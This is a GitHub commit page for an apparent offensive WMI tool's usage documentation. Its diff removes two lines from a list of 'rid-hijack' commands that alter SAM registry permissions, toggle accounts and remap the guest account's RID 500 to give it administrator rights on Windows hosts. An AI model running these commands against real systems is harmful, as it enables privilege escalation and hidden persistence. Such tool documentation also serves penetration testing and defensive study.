-
Notifications
You must be signed in to change notification settings - Fork 123
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
d05a622
commit 67e5e88
Showing
1 changed file
with
0 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -137,8 +137,6 @@ Eventlog: | |
RID Hijack: | ||
python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action grant (Grant access permissions for SAM/SAM subkey in registry) | ||
python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action grant-old (For old version OS, such as server 2003) | ||
python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action retrieve (Restrict access permissions for SAM/SAM subkey in registry) | ||
python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action retrieve-old (For old version OS, such as server 2003) | ||
python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action activate (Activate user) | ||
python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action deactivate (Deactivate user) | ||
python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500) | ||
|